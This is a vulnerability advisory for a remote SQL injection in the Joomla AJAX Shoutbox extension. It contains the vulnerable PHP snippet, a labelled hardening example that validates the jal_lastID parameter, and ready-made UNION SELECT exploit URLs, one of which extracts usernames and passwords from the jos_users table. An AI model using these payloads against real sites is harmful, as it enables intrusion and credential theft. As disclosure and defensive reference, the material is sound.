Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability


###################################################################################
Joomla AJAX Shoutbox remote SQL Injection vulnerability
 
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code: 
// jal_lastID is read as a raw request value (string), with no integer cast or validation
$jal_lastID = JRequest::getVar( 'jal_lastID', 0 );

// the unvalidated value is concatenated straight into the SQL statement
$query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
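Hardened handling of the same parameter, added here as an example; this is not the extension's code. It validates jal_lastID as a non-negative integer before it is interpolated, which is the property the vulnerable snippet lacks. The function names (jal_last_id, jal_query) and the sample requests are constructed for this illustration; inside Joomla the equivalent one-line fix is JRequest::getInt('jal_lastID', 0) in place of JRequest::getVar().

```php
<?php
// Added example, not the AJAX Shoutbox code. Stand-alone PHP: it models the
// request handling without the Joomla framework (assumption for this demo).

/**
 * Return a validated, non-negative integer for jal_lastID, or null when the
 * raw request value is not a plain integer (for example a UNION payload).
 * A missing parameter keeps the default of 0 used by the original code.
 */
function jal_last_id(array $request): ?int
{
    if (!array_key_exists('jal_lastID', $request)) {
        return 0;
    }
    $id = filter_var(
        $request['jal_lastID'],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]
    );
    return ($id === false) ? null : $id;
}

/**
 * Build the shoutbox query. Only a PHP integer can reach this point, so the
 * interpolation is safe; the explicit (int) cast documents that invariant.
 * (In Joomla, JRequest::getInt('jal_lastID', 0) performs the same coercion.)
 */
function jal_query(int $lastId): string
{
    return 'SELECT * FROM #__shoutbox WHERE id > ' . (int) $lastId . ' ORDER BY id DESC';
}

// Constructed sample requests: a normal id, an injection-shaped value, no parameter.
$samples = [
    ['jal_lastID' => '42'],
    ['jal_lastID' => '42 union select 1,2,3,4,5,6 from tbl-- -'],
    [],
];

foreach ($samples as $req) {
    $id = jal_last_id($req);
    if ($id === null) {
        // Reject (and ideally log) instead of silently truncating: the value is hostile.
        echo 'rejected: ' . var_export($req['jal_lastID'], true) . PHP_EOL;
        continue;
    }
    echo jal_query($id) . PHP_EOL;
}
```

Rejecting rather than casting is deliberate: a bare (int) cast would also neutralise the injection, but it hides the attempt, whereas a validation failure can be surfaced to logging and monitoring.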
 
[-] Exploit: 
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
 
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
 
[+] An amazing tool to discover and exploit SQL Injection vulnerabilities [ Sculptor - sculptordev.com ]
Found by https://twitter.com/MSM_1st
 
###################################################################################


